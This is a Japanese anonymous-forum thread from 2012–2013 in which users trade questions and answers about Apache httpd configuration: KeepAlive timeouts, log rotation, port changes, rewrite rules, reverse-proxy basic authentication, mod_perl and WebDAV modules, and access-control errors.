2012/06/08(金) 11:57:00.39keepalivetimeoutを変更してみたりもしたのですが全く状況は変わりません。
あきらかに設定の5秒より長く接続が維持されています(というかリクエストが終わっても分単位で接続されっぱなしになる)
proxyの可能性ですか・・・一応リクエストヘッダにはproxy経由っぽいヘッダは無いのですがそれは秘匿できるのかな。
クライアントがproxyを使っているとこちらのkeepalivetimeoutの設定と関係なく長時間keepaliveを維持することもできちゃうということなのでしょうか?
0840名無しさん@お腹いっぱい。
2012/06/08(金) 12:12:24.94スローロリス対策用のタイムアウトの方を短くしてみるとか。
0841名無しさん@お腹いっぱい。
2012/06/08(金) 13:22:29.04http://setup.192.168.0.254.xip.io/
0842835
2012/06/08(金) 22:00:27.32相手のproxyとかネットワーク機器とウチのサーバとの相性みたいなのもあったりするのかなあ。
その他大勢のユーザーは問題ないのだけども。
0843名無しさん@お腹いっぱい。
2012/06/09(土) 05:58:06.40Timeoutで足切りすればいいじゃん。
0844名無しさん@お腹いっぱい。
2012/06/13(水) 23:24:06.530845名無しさん@お腹いっぱい。
2012/06/14(木) 00:02:46.49レポート楽しみにしてるよ
0846名無しさん@お腹いっぱい。
2012/06/18(月) 18:59:16.75mrubyって require 機能が無いんだな (mrubyコアに組み込みコンパイルする必要がある)
sockも無いので、DBとのインターフェース設計どうしようかねぇ
0847名無しさん@お腹いっぱい。
2012/06/22(金) 08:53:40.59prifixが付いたり付かなかったりするようです。
とあるアクセスを「/robots.txt」に置換する場合
local path result: /robots.txt
prefixed with document_root to /www/htdocs2/robots.txt
go-ahead with /www/htdocs2/robots.txt [OK]
と出るのですが下位ディレクトリの「/lib/robots.txt」に置換しようとすると
local path result: /lib/robots.txt
go-ahead with /lib/robots.txt [OK]
とprifixが付かずにLinuxRootからのパスが存在しないディレクトリとなります。
必ずprifixが付くようにするにはhttpd.confに何を設定すれば良いでしょうか?
0848名無しさん@お腹いっぱい。
2012/06/22(金) 09:02:39.91CentOS 6.2
apache 2.2.22
apacheはソースからインストールしています。
0849名無しさん@お腹いっぱい。
2012/06/22(金) 14:36:48.520850名無しさん@お腹いっぱい。
2012/06/23(土) 00:04:36.44付けないらしいのですが、httpd.confでやってる場合は先頭に/を
付けるらしいです。/を付けないとエラーとなりました。
0851名無しさん@お腹いっぱい。
2012/06/25(月) 22:34:55.83GET /xxxxx/undefined HTTP/1.1
PHP,Javascriptなどのソースプログラムは何も変更していません。
原因などお分かりの方、教えて下さい。
0852名無しさん@お腹いっぱい。
2012/06/25(月) 23:00:42.060853名無しさん@お腹いっぱい。
2012/06/26(火) 09:25:15.43今まで気づかなかったバグがはっかくしただけ、よくある話。
0854名無しさん@お腹いっぱい。
2012/06/27(水) 18:48:36.80スパム対策に検討しています。
0855名無しさん@お腹いっぱい。
2012/06/27(水) 19:18:31.59RFC読んでこい。
0856名無しさん@お腹いっぱい。
2012/06/27(水) 19:21:38.29それ何かメリットあるの?
0857名無しさん@お腹いっぱい。
2012/06/27(水) 22:35:01.82mod_rewriteでsleep(3600)なプログラムに飛ばすとか?
ただ、スパムが嫌なら404とか403とか返せばいいじゃん
0858名無しさん@お腹いっぱい。
2012/06/27(水) 23:45:21.680859名無しさん@お腹いっぱい。
2012/06/28(木) 00:00:33.420860名無しさん@お腹いっぱい。
2012/06/28(木) 01:32:07.560861854
2012/06/28(木) 12:03:51.21パケットフィルタでやるべきっぽいですね。
ありがとうございます。
0862名無しさん@お腹いっぱい。
2012/06/28(木) 12:37:20.77「頭の悪いスパム」がそんな頭のいいことするか?
0863名無しさん@お腹いっぱい。
2012/06/28(木) 12:59:09.500864854
2012/06/28(木) 14:09:47.83そうすればスパム側からアタック数を鈍らせることができるのではと思いました。
SSHでの接続も同様に反応させない方が効果的な場合があるので。
0865名無しさん@お腹いっぱい。
2012/06/28(木) 14:30:09.68でも、誤爆することもあって評判悪い手法だよ
0866854
2012/06/28(木) 14:33:27.37似てますね。
検索エンジンにも載せたくないクローズドなサービスでPCからはアクセスできないようにしています。
そのため、PCからの解析目的やアタックを禁止したかったのです。
たしかに誤爆は怖いですね。
0867名無しさん@お腹いっぱい。
2012/06/28(木) 14:52:47.31パスワードかけるなりアクセス元限定するなりしないと。
0868名無しさん@お腹いっぱい。
2012/06/28(木) 16:32:31.700869854
2012/06/28(木) 17:45:49.890870名無しさん@お腹いっぱい。
2012/06/28(木) 17:47:25.800871854
2012/06/28(木) 17:51:21.27この話題はここでクローズさせていただきます。
403のままでいこうかなと思います。
0872名無しさん@お腹いっぱい。
2012/06/28(木) 18:06:09.34推測されるとマズいのか?
0873名無しさん@お腹いっぱい。
2012/06/28(木) 22:33:22.33> PCからの解析目的やアタックを禁止したかったのです。
アクセス出来ないようにしているのに禁止したいってどゆことやろ・・・
0874名無しさん@お腹いっぱい。
2012/06/28(木) 22:34:03.050875名無しさん@お腹いっぱい。
2012/06/28(木) 22:42:28.270876名無しさん@お腹いっぱい。
2012/06/28(木) 23:40:29.140877名無しさん@お腹いっぱい。
2012/07/02(月) 18:50:02.42ここの人間はそれも否定するのか?
0878名無しさん@お腹いっぱい。
2012/07/02(月) 18:58:07.250879名無しさん@お腹いっぱい。
2012/07/02(月) 20:56:23.65メールは詰まっても相手が待ってくれるし、同一IPからの接続数制御が拡張じゃなく実装されてるし
一秒に数百の転送とかあまり機会無いし
まぁ、mod_cbandあたりを検討してみたまえと。
0880名無しさん@お腹いっぱい。
2012/07/02(月) 20:58:12.71というかTarpittingでも負荷が馬鹿にならないからpostscreenが作られたんじゃなかったっけ…
0881名無しさん@お腹いっぱい。
2012/07/02(月) 21:02:36.50HTTPの攻撃は詰まってもゆっくり攻撃続けるだけ。
0882名無しさん@お腹いっぱい。
2012/07/02(月) 22:51:51.500883名無しさん@お腹いっぱい。
2012/07/08(日) 10:50:27.02mod_wsgi:デーモンプロセスモード(プロセスを複数起動)
として連携しているときのリクエストとデーモンプロセスの紐付けについて質問です。
リクエストのクッキー(セッション番号)を識別して、mod_wsgiの
デーモンプロセスにリクエストを振り分けることはできないでしょうか?
※リクエストに紐付けたいのはmod_wsgiのデーモンプロセスであって
apacheの子プロセスではありません
製品アプリになのですが、
http://www.4d.com/4d_docv13/4D/13/Web-Sessions-Management.300-862107.ja.html
ここに書かれているようなことをapache+mod_wsgiでやりたいということです。
【内容抜粋(ここから)】
4D Webサーバーはユーザーセッションを容易に管理するメカニズムを提供します。
この自動メカニズムを使用して、後のリクエストでWebクライアントが同じコンテキスト
(セレクションや変数の値) を再利用できます。
このメカニズムでは4Dが自動で設定するプライベートな"4DSID"という名前のcookieを使用します
(cookie名は変更できます)。Webクライアントからリクエストを受信するたびに4Dは4DSID cookie
が 送信されてきたか、またその値をチェックします
cookieの値がリクエストヘッダーに含まれていれば、4Dは存在するWebプロセスの中から
対応するプロセスを検索します。
プロセスが見つかれば、そのプロセスがWebリクエストの処理に使用されます。Compiler_Web
メソッドは実行されません。
プロセスが見つからない場合、4Dは新しいプロセスを作成します。
cookieがリクエストヘッダーに含まれていなければ、4Dは新しいコンテキストを作成します。
【内容抜粋(ここまで)】
何卒よろしくお願いします
0884名無しさん@お腹いっぱい。
2012/07/08(日) 20:30:29.97Googleに聞けよ
0885名無しさん@お腹いっぱい。
2012/07/16(月) 03:05:28.79自分のサーバでテストしたところ数分でログが100MBに達しました
皆さんは何か対策してますか?
0886名無しさん@お腹いっぱい。
2012/07/16(月) 03:23:25.20リクエスト長制限しておけばいいんじゃね
そもそもdisk fullより先にサービス停止ちゃいそうだけど
0887名無しさん@お腹いっぱい。
2012/07/16(月) 08:37:01.760888名無しさん@お腹いっぱい。
2012/07/17(火) 07:31:48.79rotatelogs でサイズ単位でローテート、とか?
0889名無しさん@お腹いっぱい。
2012/07/17(火) 23:05:39.180890名無しさん@お腹いっぱい。
2012/07/18(水) 16:39:52.63ErrorLog "|bin/rotatelogs /var/logs/errorlog.%Y-%m-%d-%H_%M_%S 5M"
http://httpd.apache.org/docs/2.2/programs/rotatelogs.html
0891名無しさん@お腹いっぱい。
2012/07/18(水) 16:52:02.40おわかりいただけただろうか?
089277
2012/07/18(水) 21:33:36.54いろいろ調べてみると、VMWareがポート443を使っているため
競合して起動できないようです。
VMWareの変更はできないようなので、Apache側を変えたいのですが
どうすればよいでしょうか?(同一環境内で)
0893名無しさん@お腹いっぱい。
2012/07/18(水) 21:49:21.24Listenいじってポートを変える
0894名無しさん@お腹いっぱい。
2012/07/18(水) 21:54:42.050895名無しさん@お腹いっぱい。
2012/07/18(水) 22:00:40.36しかもsslの
kvmのを動かした方が早そうだけど…
0896892
2012/07/19(木) 00:05:19.11Listenってhttpd-ssl.confでポート443が使われてたので444に変えてみました。
これってSSL使うウェブサイト作ると問題出てきますか?
0897名無しさん@お腹いっぱい。
2012/07/19(木) 01:07:58.62外部に公開するWebサイトならポートは変えないほうがいいです
変えるなら>>895さんが言うとおりkvmの方のポートですね
0898名無しさん@お腹いっぱい。
2012/07/19(木) 01:52:13.780899名無しさん@お腹いっぱい。
2012/07/19(木) 03:04:31.46apacheはアドレス指定でバインドすればいい。
両方とも443で待てる。
0900名無しさん@お腹いっぱい。
2012/07/29(日) 18:23:10.89のチルダ抜きでのアクセスで
ln -s /home/username/public_html /var/www/username
で対処するのってまずいですか?
AliasMatch使ったほうがいいですか?
0901名無しさん@お腹いっぱい。
2012/07/29(日) 19:07:41.980902名無しさん@お腹いっぱい。
2012/07/29(日) 21:05:37.99そんな感じのことってありますか?
0903名無しさん@お腹いっぱい。
2012/07/29(日) 21:21:36.050904名無しさん@お腹いっぱい。
2012/07/29(日) 21:26:18.47setuidにさえ気を付ければこのやり方固有の問題は無いってことですね
ありがとうございます
0905名無しさん@お腹いっぱい。
2012/07/30(月) 01:15:17.020906名無しさん@お腹いっぱい。
2012/07/30(月) 02:49:11.92ありがとうございました
0907名無しさん@お腹いっぱい。
2012/08/01(水) 12:42:37.17サーバー上からコマンドラインで取得するには、どうすればいいでしょうか?
apachectlを使ってみたところ、
>apachectl status | grep -i "requests currently being processed"
1 requests currently being processed, 7 idle workers
となって、httpで接続しても1 requestsのまま変わりません。
httpでアクセスすると接続本数が0→1になって、ページを閉じて、
KeepAliveTimeOutに設定した時間を過ぎると、1→0となってほしいのですが。
0908名無しさん@お腹いっぱい。
2012/08/01(水) 14:05:16.840909名無しさん@お腹いっぱい。
2012/08/01(水) 14:38:29.00情報を取得してるってことは理解してる?
その接続のぶんもカウントされるからゼロになることはないよ。
0910907
2012/08/01(水) 16:01:32.35netstatでもできました。
$ netstat -an -p tcp | awk '{ if($4=="192.168.1.1.80" && $6=="ESTABLISHED") print($0)}' | wc -l
>>909
あ、なるほど。解説ありがとうございました。
KeepAliveTimeOutに設定した時間を過ぎると、2→1となることが確認できました。
0911名無しさん@お腹いっぱい。
2012/08/01(水) 22:22:45.30module_rewriteを使って、
rewriteruleで[R=ステータスコード]とする方法を試しました。
3xx系はいけたんですが、4xx/5xx系のステータスコードを設定すると、
なぜかapacheが用意済み?の英語メッセージになります。
こういったやり方は駄目なんですか?
RewriteRule 元URL 遷移先URL [L,R=503]
※同一ステータスで異なる遷移先が必要なので、
ErrorDocumentを使う方法はNGかなと考えてます。
0912名無しさん@お腹いっぱい。
2012/08/02(木) 01:01:20.550913名無しさん@お腹いっぱい。
2012/08/02(木) 02:26:19.120914名無しさん@お腹いっぱい。
2012/08/16(木) 17:27:11.84ProxyPass /hoge/ http://a.b.c.d/hoge/
↑これはうまく動いてます
どうせならベーシック認証も同時に通すかと
ProxyPass /hoge/ http://id:pass@a.b.c.d/hoge/
↑こうすると、リバプロとしては動きますがis:passのベーシック認証が通りません
リバースプロクシーにベーシック認証のid:passを書いて使う方法はないですか?
なんでここにid:passを書きたいかというと、リバプロで複数台ぐらいのWebサーバーを集約すると、
集約元の各サーバーのベーシック認証のid:passをブラウザが覚えてくれないからです
0915名無しさん@お腹いっぱい。
2012/08/16(木) 17:52:37.320916名無しさん@お腹いっぱい。
2012/08/16(木) 18:14:24.15パスワードは全部違うんですけど
0917名無しさん@お腹いっぱい。
2012/08/16(木) 19:53:55.69ブラウザもあるかもね
0918名無しさん@お腹いっぱい。
2012/08/16(木) 20:11:53.62AuthName で指定するのはダイアログに表示するメッセージではなく認証領域なので、
同じホストでも認証領域が違えば同じユーザ/パスワードは使えないという
前提で実装するのが正しい。そうでないならある認証領域に別の認証領域の
ユーザ情報を漏曳するというセキュリティホールになる。
0919名無しさん@お腹いっぱい。
2012/08/16(木) 20:27:28.32どんなAuthNameだよww
0920名無しさん@お腹いっぱい。
2012/08/16(木) 22:19:42.04同じアカウントあると認証通るよ
0921名無しさん@お腹いっぱい。
2012/08/16(木) 22:47:40.340922名無しさん@お腹いっぱい。
2012/08/16(木) 22:56:54.920923名無しさん@お腹いっぱい。
2012/08/16(木) 23:04:10.28それとも自分で勝手に考えてるんだろうか。
0924名無しさん@お腹いっぱい。
2012/08/16(木) 23:04:58.180925名無しさん@お腹いっぱい。
2012/08/17(金) 10:17:32.940926名無しさん@お腹いっぱい。
2012/08/17(金) 12:49:54.820927名無しさん@お腹いっぱい。
2012/08/17(金) 20:24:57.050928名無しさん@お腹いっぱい。
2012/08/29(水) 01:50:26.67たとえば、index.cgiが 404 になる。
mod_perl が無効なディレクトリでは index が動作する。
なんででしょう?
ぐぐると、mod_rewrite との関係の話があったけど、mod_rewriteを無効にしても
結果は変わらんかった。
mod_perlの設定は以下のような。
<IfModule mod_perl.c>
Alias /cgi/ "/home/user/public_html/cgi/"
<Location "/cgi">
SetHandler perl-script
PerlHandler ModPerl::Registry
Options ExecCGI
Allow from all
PerlSendHeader On
</Location>
</IfModule>
0929名無しさん@お腹いっぱい。
2012/08/29(水) 07:20:11.630930名無しさん@お腹いっぱい。
2012/09/01(土) 01:15:29.87http://marc.info/?l=apache-modperl&m=112805393100758&w=2
パッチが出てる
0931名無しさん@お腹いっぱい。
2012/09/05(水) 00:49:55.15KeepAlive中に400以降のステータスコードが出た場合、張っていたセッションは明示的に切られますか?それとも200同様にセッションは継続できますか?
検索したのですがtomcatとかなんかはヒットしたのですが、apacheの動作は見つけられませんでした
0932名無しさん@お腹いっぱい。
2012/09/05(水) 00:55:26.800933名無しさん@お腹いっぱい。
2012/09/05(水) 05:29:56.13異常系なのでソースでも読めば
0934名無しさん@お腹いっぱい。
2012/10/23(火) 03:27:08.20うちにもいるわw こういう略語使う馬鹿
ダブルクリックのことをダブクリとか
は?って聞き返してしまった
0935名無しさん@お腹いっぱい。
2012/10/29(月) 14:13:20.2716進のコードは何を意味してるの?
0936名無しさん@お腹いっぱい。
2012/10/29(月) 14:59:31.45HTTP/1.1のchunked encoding?
0937名無しさん@お腹いっぱい。
2012/11/03(土) 13:10:53.500938名無しさん@お腹いっぱい。
2012/12/27(木) 15:02:41.96apache2 で WebDAV を使いたくて、apache2 のインストール時?に、
一緒にインストールされるサンプル
/usr/share/doc/apache2/examples/apache2/extra/httpd-dav.conf
を参考にしているのですが、このサンプルの中身の記述のせいで戸惑っています。
このサンプルには、次のようなコメントがあります。
# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
# mod_auth_digest, mod_authn_file
しかしこれらのモジュール名は、apache の、
たぶんもっと古いバージョンの時代に用いられていたもののはずで、
現在の apache2.2 ではすでに廃止されているものかと思います。
現在の apache2.2 で WebDAV を使うのに必要なモジュールというのは、
正確には何でしょう?以下の4つで良いのでしょうか?
/etc/apache2/mods-available/dav_fs.conf
/etc/apache2/mods-available/dav_fs.load
/etc/apache2/mods-available/dav.load
/etc/apache2/mods-available/dav_lock.load
0939名無しさん@お腹いっぱい。
2012/12/27(木) 15:05:17.94その辺はディストリ依存の話だからLinux板へ。
0940名無しさん@お腹いっぱい。
2012/12/27(木) 15:28:19.620941名無しさん@お腹いっぱい。
2013/01/17(木) 10:08:49.97環境は Ubuntu Server 12.0.4.1 LTS amd64 です。
apache2.2 で rep2 鯖にしようと思ってます。
この書き込み自体がその環境からのもので、つまり既に動いてます。
ただ apache の使用ポートをデフォルトの 80 から任意のもの(例えば81)に変更したくて、
/etc/apache2/ports.conf をそのように書き換え、 # service apache2 restart したんですが、
NameVirtualHost *:81 has no VirtualHosts と言われてサービスを正しく起動出来ません。
apache2 自体が起動しなくなります。
任意のポートで正しく apache2 を起動させるには、何処をいじる必要がありますか?
ディストリビューション固有の問題は自分で調べるとして、
apache2.2で特定ポートを使用する場合にせねばならない一般的なことに関して、
どなたかアドバイスをいただけないでしょうか。
よろしくお願いいたします。
0942名無しさん@お腹いっぱい。
2013/01/17(木) 12:10:06.880943名無しさん@お腹いっぱい。
2013/01/17(木) 12:31:59.25VirtualHostsは使ってる?
使ってないのならListenだけ81にしてVirtualHostは80のままだと起動する 今12.10で確認した
0944名無しさん@お腹いっぱい。
2013/01/17(木) 12:59:10.99しかし htttp://ubuntu.local.ip.address:81/ にアクセスしても「そんなん無い」って言われて、
元の /var/www/index.html を読みに行けませんでした。
おかしいと思って /etc/apache2/sites-available/default を見たら、
そこに VirtualHost の定義があったので、/etc/apache2/ports.conf の設定共々、
VirtualHost *:81 にしてやったら普通に起動し、
かつ、/var/www/index.html も読みに行ってくれました。
というわけで今回のこの投稿は htttp://ubuntu.local.ip.address:81/rep2/ からとなります。
ありがとうございました。
0945名無しさん@お腹いっぱい。
2013/01/19(土) 09:10:33.75ポート番号は任意のものが使えるわけではない
0946名無しさん@お腹いっぱい。
2013/01/19(土) 14:47:15.020947名無しさん@お腹いっぱい。
2013/01/19(土) 16:44:33.03Listenしてるポートを変更してVirtualHost側の定義も合わせたからだろ
httpdはListenで指定されたポートを開き
VirtualHostが指定されている場合はその中から選択できるってだけの話
こんな事くらいドキュメント読めや
ttp://httpd.apache.org/docs/2.2/bind.html#virtualhost
ttp://httpd.apache.org/docs/2.2/mod/mpm_common.html#listen
あとUbuntu固有の設定ファイルの話されても知ったこっちゃねーぞ
ビルド者のオナニー設定について質問したいならUbuntuのスレでやれ
0948名無しさん@お腹いっぱい。
2013/01/19(土) 19:08:14.31ごめんねオレオレツールで本家に迷惑かけてるディストリビューション使ってて
0949名無しさん@お腹いっぱい。
2013/01/19(土) 21:29:47.520950名無しさん@お腹いっぱい。
2013/01/19(土) 21:30:47.98Apacheを次のどちらにインストールしていますか?
1。物理マシン
2。仮想マシン(VMWare Player、VirtualBoxなど)
0951名無しさん@お腹いっぱい。
2013/01/19(土) 21:57:51.300952名無しさん@お腹いっぱい。
2013/01/19(土) 22:03:28.14Apacheを次のどちらにインストールしていますか?
1. 物理マシン
2. 仮想マシン(VMWare Player、VirtualBoxなど)
0953名無しさん@お腹いっぱい。
2013/01/19(土) 22:23:54.200954名無しさん@お腹いっぱい。
2013/01/19(土) 23:55:43.320955名無しさん@お腹いっぱい。
2013/01/20(日) 09:38:33.03VM環境が増えてきたから、普段は意識していないけど
0956名無しさん@お腹いっぱい。
2013/01/22(火) 23:43:49.90調べる方法ってどんなんがありますかね・・・?
CPUを専有してるやつを別鯖に分離したいんですが。
0957名無しさん@お腹いっぱい。
2013/01/23(水) 00:25:48.320958名無しさん@お腹いっぱい。
2013/01/23(水) 08:52:16.690959名無しさん@お腹いっぱい。
2013/01/23(水) 10:25:36.370960名無しさん@お腹いっぱい。
2013/01/23(水) 16:07:08.59#!/bin/sh
time perl.bin "$@"
というwrapperに入れ替える。
CGI以外からの実行に対して何等かの小細工が必要だけど。
0961名無しさん@お腹いっぱい。
2013/01/23(水) 16:25:59.880962名無しさん@お腹いっぱい。
2013/01/25(金) 22:43:45.530-9000まで調べた?
0963名無しさん@お腹いっぱい。
2013/02/11(月) 15:06:08.56いまいち意味が分からないので質問させて下さい。
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [QSA,L] ← これはどういう意味ですか?
</IfModule>
0964名無しさん@お腹いっぱい。
2013/02/11(月) 18:43:06.86[ ] 内の話なら↓。
http://httpd.apache.org/docs/2.2/rewrite/flags.html
0965名無しさん@お腹いっぱい。
2013/02/25(月) 13:48:33.44[client ::] client denied by server configuration:
と出力されるのですが、何が原因でしょうか?
Directoryタグ内でアクセス制限をかけていますが、同じページでも表示されたりされなかったりばらばらです
0966名無しさん@お腹いっぱい。
2013/02/26(火) 14:51:44.23> client denied by server configuration:
あんたが拒絶するように設定したからだよ。
0967名無しさん@お腹いっぱい。
2013/02/26(火) 16:40:41.250968965
2013/02/27(水) 09:28:24.33Order deny,allow
Deny from all
Allow from 192.168.1.0/24
と設定しているのですが、許可されたセグメントからアクセスしているにもかかわらず、上のログが出力されているので、質問しました
Allow from 192.168.1.0/24 ::
とすることで、一応はエラーが出なくなったようですが、やはり気持ち悪いです
0969名無しさん@お腹いっぱい。
2013/03/09(土) 20:55:56.900970名無しさん@お腹いっぱい。
2013/03/13(水) 03:26:42.91どんどん減っていき、しまいには一桁になってしまいサイト表示が出来なくなるとい
う症状が出ています。
この状態に陥ったときは、apacheをrestartしても直ぐに症状が再発しまい、サーバー
をリブートしないと改善しないので困り果てています。
また、apacheのエラーログやmessagesにはこの件に関係するログは何も出力されて
いません。
どなたか同じような症状を経験されて、対応出来た方アドバイスを頂けないでしょ
うか。
0971970
2013/03/13(水) 03:28:19.73サイトが表示出来ていない事を確認し、/etc/init.d/httpd restartをするも
Address already in use: make_sock: could not bind to addressと出る
killall httpdとし、その後/etc/init.d/httpd startをすると正常にapacheが起動
するも、apache start後、直ぐにapacheのプロセス数が1001まで一気に上昇しその後
一気にプロセス数が下がっていく。秒間およそ200プロセス位が減っていたと思います。
apache start後のプロセス数上昇中はサイト表示が出来ているが、一気にプロセス数
が減少しはじめた段階でサイト表示は出来ていない。
普段は同様の時間帯でapacheのプロセス数は400程度。
apacheはprefork
MaxClientやServerLimitなどは以下のとおりです。
StartServers 8
MinSpareServers 5
MaxSpareServers 50
ServerLimit 1500
MaxClients 1500
MaxRequestsPerChild 2000
尚、KeepAliveはoffです。
どなたかアドバイス頂けないでしょうか。宜しくお願いします。
0972名無しさん@お腹いっぱい。
2013/03/13(水) 10:44:38.690973970
2013/03/13(水) 10:47:32.26たしかにw
書き込んでから気づきました、そうしますw
0974名無しさん@お腹いっぱい。
2013/03/14(木) 16:12:24.890975名無しさん@お腹いっぱい。
2013/05/06(月) 22:24:55.20ほとんど使わないって認識であってますか
0976名無しさん@お腹いっぱい。
2013/05/24(金) 06:44:27.23俺はいつもlocalhostって書いちゃう
0977名無しさん@お腹いっぱい。
2013/05/24(金) 08:52:48.330978名無しさん@お腹いっぱい。
2013/05/24(金) 09:14:13.62/hoge がディレクトリだったときに /hoge/ にリダイレクトするのに
UseCanonicalName の設定によっては ServerName の値が使われることがある。
0979名無しさん@お腹いっぱい。
2013/05/25(土) 00:55:47.73テストと公開版の切り替えとかね
0980名無しさん@お腹いっぱい。
2013/08/07(水) NY:AN:NY.ANttp://zuqqhi2.com/?p=182 こちらのサイトを参考にドメイン/jenkinsでアクセスするようにしようとしたら
既に<VirtualHost *:80>内にvar/www/htmlの設定が記述されていました
ホームページも作って置いてあるのでアクセスできるようにしつつ、jenkinsにもアクセスできるようにするには
<VirtualHost *:80>の項目を2つ作成すればいいということですか?それとも<VirtualHost *:80>タグ内の
既存の項目の下に追記すればよいのでしょうか
0981名無しさん@お腹いっぱい。
2013/08/07(水) NY:AN:NY.AN何言ってんのかよくわからんけどこの辺の話?
http://httpd.apache.org/docs/2.4/mod/mod_alias.html#alias
http://httpd.apache.org/docs/2.4/vhosts/
0982名無しさん@お腹いっぱい。
2013/08/08(木) NY:AN:NY.AN/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
レス数が950を超えています。1000を超えると書き込みができなくなります。